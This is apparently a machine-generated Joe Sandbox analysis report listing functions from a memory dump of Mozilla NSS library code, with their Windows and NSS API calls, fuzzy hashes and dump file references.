                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1376842649-0
                                                                                                                                                                                                                            • Opcode ID: 9d9272b92dbf9069460dd64406e97761af3bccae270bb1b06c577e196ae33b19
                                                                                                                                                                                                                            • Instruction ID: f89ec33b3042088e491fa858e9e866c0544ad8223cf66bc162987a2284de4f20
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d9272b92dbf9069460dd64406e97761af3bccae270bb1b06c577e196ae33b19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB110C7AE00555ABDB111B29EC058AE3B78EF0225CF144131ED1893B11FB32DA69C6E1
                                                                                                                                                                                                                            Function 6CB69C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB811C0: PR_NewLock.NSS3 ref: 6CB81216
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB69E17
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB69E25
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB69E4E
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB69EA2
                                                                                                                                                                                                                              • Part of subcall function 6CB79500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CB79546
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB69EB6
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB69ED9
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CB69F18
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3381623595-0
                                                                                                                                                                                                                            • Opcode ID: 09c410f0e19e6fb9651035c3bbf91cad4535a4d86f50c4ac518989036073ecd8
                                                                                                                                                                                                                            • Instruction ID: f5182b0cc3f871f210dd322f730ed1b90670e66bfa1e458f4f6a52e06a049b6b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09c410f0e19e6fb9651035c3bbf91cad4535a4d86f50c4ac518989036073ecd8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D181EFB1E01681ABEB109F35DC40AAFB7A9FF55248F144528EC5987F41FB31E918C7A2
                                                                                                                                                                                                                            Function 6CB7DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: DeleteCriticalSection.KERNEL32(D958E852,6CB81397,5B5F5EC0,?,?,6CB7B1EE,2404110F,?,?), ref: 6CB7AB3C
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: free.MOZGLUE(D958E836,?,6CB7B1EE,2404110F,?,?), ref: 6CB7AB49
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: DeleteCriticalSection.KERNEL32(5D5E6CD7), ref: 6CB7AB5C
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: free.MOZGLUE(5D5E6CCB), ref: 6CB7AB63
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CB7AB6F
                                                                                                                                                                                                                              • Part of subcall function 6CB7AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CB7AB76
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB7DCFA
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6CB7DD0E
                                                                                                                                                                                                                            • PK11_IsFriendly.NSS3(?), ref: 6CB7DD73
                                                                                                                                                                                                                            • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CB7DD8B
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB7DE81
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB7DEA6
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB7DF08
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 519503562-0
                                                                                                                                                                                                                            • Opcode ID: 093922d0bf0033eeab2d0d60672d3ed6cc90b256aa068e68869cb5ed6c5f3148
                                                                                                                                                                                                                            • Instruction ID: 4b401e365aa1280e0edf34af34227d318d1b1124766d8d197e4b29239e098b43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 093922d0bf0033eeab2d0d60672d3ed6cc90b256aa068e68869cb5ed6c5f3148
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF91D4B5A001459FDF21CF68E880BAEB7B1EF44348F244029DD29AB741E731E955CBB2
                                                                                                                                                                                                                            Function 6CB52D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __allrem
                                                                                                                                                                                                                            • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                                            • API String ID: 2933888876-3221253098
                                                                                                                                                                                                                            • Opcode ID: 9420797a11dcf24de56e1a0d70cab6a66b9bea427971d649d5a0a49be0f673f6
                                                                                                                                                                                                                            • Instruction ID: 4b41abd894560b0aed5266c6036a198b16e6c803d095d8759f6dc6cf83458458
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9420797a11dcf24de56e1a0d70cab6a66b9bea427971d649d5a0a49be0f673f6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1618071B012059FDB04CFA8DC98A6A77B1FF49314F50812CE91A9B7D0EB35AD16CB92
                                                                                                                                                                                                                            Function 6CB8BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CERT_NewCertList.NSS3 ref: 6CB8BD1E
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB62F0A
                                                                                                                                                                                                                              • Part of subcall function 6CB62F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB62F1D
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB6B41E,00000000,00000000,?,00000000,?,6CB6B41E,00000000,00000000,00000001,?), ref: 6CBA57E0
                                                                                                                                                                                                                              • Part of subcall function 6CBA57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CBA5843
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB8BD8C
                                                                                                                                                                                                                              • Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7
                                                                                                                                                                                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CB8BD9B
                                                                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CB8BDA9
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB8BE3A
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB63EC2
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB63ED6
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB63EEE
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CB63F02
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: PL_FreeArenaPool.NSS3 ref: 6CB63F14
                                                                                                                                                                                                                              • Part of subcall function 6CB63E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB63F27
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB8BE52
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB62CDA,?,00000000), ref: 6CB62E1E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB62E33
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: TlsGetValue.KERNEL32 ref: 6CB62E4E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: EnterCriticalSection.KERNEL32(?), ref: 6CB62E5E
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableLookup.NSS3(?), ref: 6CB62E71
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableRemove.NSS3(?), ref: 6CB62E84
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB62E96
                                                                                                                                                                                                                              • Part of subcall function 6CB62E00: PR_Unlock.NSS3 ref: 6CB62EA9
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB8BE61
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2178860483-0
                                                                                                                                                                                                                            • Opcode ID: 00831abb7724326f6677b17bfbaf792c0982212f3b398292da5cc762feb13206
                                                                                                                                                                                                                            • Instruction ID: ed43e1c923bb2299784d8e5a5277ba02e503405cb10164f9f1b2be52b822a9d5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00831abb7724326f6677b17bfbaf792c0982212f3b398292da5cc762feb13206
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B41E3B6A01650AFD710CF28DC80A6E77F4EF49719F144568F94997B12E731ED08CBA2
                                                                                                                                                                                                                            Function 6CBAAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CBAAB3E,?,?,?), ref: 6CBAAC35
                                                                                                                                                                                                                              • Part of subcall function 6CB8CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB8CF16
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CBAAB3E,?,?,?), ref: 6CBAAC55
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CBAAB3E,?,?), ref: 6CBAAC70
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: TlsGetValue.KERNEL32 ref: 6CB8E33C
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: EnterCriticalSection.KERNEL32(?), ref: 6CB8E350
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: PR_Unlock.NSS3(?), ref: 6CB8E5BC
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CB8E5CA
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: TlsGetValue.KERNEL32 ref: 6CB8E5F2
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: EnterCriticalSection.KERNEL32(?), ref: 6CB8E606
                                                                                                                                                                                                                              • Part of subcall function 6CB8E300: PORT_Alloc_Util.NSS3(?), ref: 6CB8E613
                                                                                                                                                                                                                            • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CBAAC92
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBAAB3E), ref: 6CBAACD7
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CBAAD10
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CBAAD2B
                                                                                                                                                                                                                              • Part of subcall function 6CB8F360: TlsGetValue.KERNEL32(00000000,?,6CBAA904,?), ref: 6CB8F38B
                                                                                                                                                                                                                              • Part of subcall function 6CB8F360: EnterCriticalSection.KERNEL32(?,?,?,6CBAA904,?), ref: 6CB8F3A0
                                                                                                                                                                                                                              • Part of subcall function 6CB8F360: PR_Unlock.NSS3(?,?,?,?,6CBAA904,?), ref: 6CB8F3D3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2926855110-0
                                                                                                                                                                                                                            • Opcode ID: a38b3e7d4e1334110d46b4f5e9fe00f7be0d49e992c640a73f85b56419d14b7f
                                                                                                                                                                                                                            • Instruction ID: e9ad1124726a4a8894e53eb07503ca0b9f27e19e3ebdb4e05e5a1a6ac27c5960
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a38b3e7d4e1334110d46b4f5e9fe00f7be0d49e992c640a73f85b56419d14b7f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C3127B1E046556FEB008FA9DC409AF7776EF84728B188128E8559B740FB31DC068FB2
                                                                                                                                                                                                                            Function 6CB88C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6CB88C7C
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DC6
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC70A27), ref: 6CC29DD1
                                                                                                                                                                                                                              • Part of subcall function 6CC29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC29DED
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB88CB0
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB88CD1
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB88CE5
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB88D2E
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CB88D62
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB88D93
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3131193014-0
                                                                                                                                                                                                                            • Opcode ID: 9dcd46033fd6dbdec143f8567e8c530ea1ac830b6051ef2a10eee457e4199eb8
                                                                                                                                                                                                                            • Instruction ID: 0c66355ba32d26d3519cf33d1ba9033f2d9b49637bfce6e1aaecabeb2b2304d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dcd46033fd6dbdec143f8567e8c530ea1ac830b6051ef2a10eee457e4199eb8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3314A71E02255AFD7009F68DC447EA77B4FF15318F14013AEA1567B50E772A924CBD2
                                                                                                                                                                                                                            Function 6CB8DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CB8DDEC
                                                                                                                                                                                                                              • Part of subcall function 6CBC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC08B4
                                                                                                                                                                                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CB8DE70
                                                                                                                                                                                                                            • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CB8DE83
                                                                                                                                                                                                                            • HASH_ResultLenByOidTag.NSS3(?), ref: 6CB8DE95
                                                                                                                                                                                                                            • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CB8DEAE
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB8DEBB
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB8DECC
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1091488953-0
                                                                                                                                                                                                                            • Opcode ID: 23143e3a181dcaa760705a678519d11307cbae6dafb773f723e387ead8d15b93
                                                                                                                                                                                                                            • Instruction ID: 026b76d21a9d3db3e69bb412751bf352b67cd46e0ec8d740a81ff12b9c565cd0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23143e3a181dcaa760705a678519d11307cbae6dafb773f723e387ead8d15b93
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B31C1B2A012556BEF00AA78BC41BBF76A8EF54609F050126EC09A7701FB31D91886F2
                                                                                                                                                                                                                            Function 6CBBDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CBBD9E4,00000000), ref: 6CBBDC30
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CBBD9E4,00000000), ref: 6CBBDC4E
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CBBD9E4,00000000), ref: 6CBBDC5A
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBBDC7E
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CBBDCAD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                            • String ID:
